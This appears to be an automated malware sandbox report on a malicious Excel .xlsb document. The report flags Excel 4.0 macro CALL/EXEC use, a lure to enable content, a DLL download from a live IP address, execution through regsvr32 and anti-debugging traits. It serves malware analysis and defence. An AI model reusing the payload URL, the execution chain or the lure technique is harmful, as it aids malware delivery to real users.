Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://tasks.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable editing " to unlock the editing document downloaded from the Internet. . , " El 14 Protecte
Source: Screenshot number: 4	Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start ' ,, , , 18 the decryption of

Found Excel 4.0 Macro with suspicious formulas

Source: Order_Summary-9632850.xlsb	Initial sample: CALL
Source: Order_Summary-9632850.xlsb	Initial sample: CALL
Source: Order_Summary-9632850.xlsb	Initial sample: EXEC

Office process drops PE file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\regsvr32.exe

Process Stats: CPU usage > 98%

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll 337A487F1CB8F16200A5D14CAC1DAC3478E95CF3077B3872D319970131BEA702
Source: Joe Sandbox View	Dropped File: C:\Users\user\kdldyeff.dll 337A487F1CB8F16200A5D14CAC1DAC3478E95CF3077B3872D319970131BEA702

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: classification engine

Classification label: mal88.expl.evad.winXLSB@5/10@0/1

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{9D11D15E-C66E-40D8-82BE-500D324727B3} - OProcSessId.dat

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Order_Summary-9632850.xlsb	Initial sample: OLE zip file path = xl/media/image1.png
Source: Order_Summary-9632850.xlsb	Initial sample: OLE zip file path = xl/media/image2.png
Source: Order_Summary-9632850.xlsb	Initial sample: OLE zip file path = xl/media/image3.png
Source: Order_Summary-9632850.xlsb	Initial sample: OLE zip file path = xl/media/image4.png
Source: Order_Summary-9632850.xlsb	Initial sample: OLE zip file path = xl/media/image5.png

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Data Obfuscation:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_029A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

3_2_029A1030

Registers a DLL

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_04602AF0 push dword ptr [edx+14h]; ret

3_2_04602BFD

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\kdldyeff.dll

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\kdldyeff.dll

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found dropped PE file which has not been started or loaded

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll

Jump to dropped file

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_029A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

3_2_029A1030

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_029A1030 mov eax, dword ptr fs:[00000030h]	3_2_029A1030
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_048E095E mov eax, dword ptr fs:[00000030h]	3_2_048E095E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_048E0456 mov eax, dword ptr fs:[00000030h]	3_2_048E0456

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_029A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

3_2_029A1030

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\regsvr32.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe

Jump to behavior

Yara detected Xls With Macro 4.0

Source: Yara match

File source: app.xml, type: SAMPLE

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.180.199.121	unknown	Netherlands		14576	HOSTING-SOLUTIONSUS	false

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.180.199.121/sat1_0609_2.dll	false	Avira URL Cloud: safe	unknown

AV Detection:

Antivirus or Machine Learning detection for unpacked file

Source: 3.2.regsvr32.exe.2c00000.2.unpack

Avira: Label: TR/Dropper.Gen

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to behavior

Document exploit detected (drops PE files)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: sat1_0609_2[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.3:49715 -> 185.180.199.121:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.3:49715 -> 185.180.199.121:80

Networking:

Downloads executable code via HTTP

Source: global traffic

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121

Source: global traffic

Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.cortana.ai
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.office.net
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.onedrive.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://augloop.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cdn.entity.
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cortana.ai
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cortana.ai/api
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cr.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://directory.services.
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://graph.windows.net
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://graph.windows.net/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
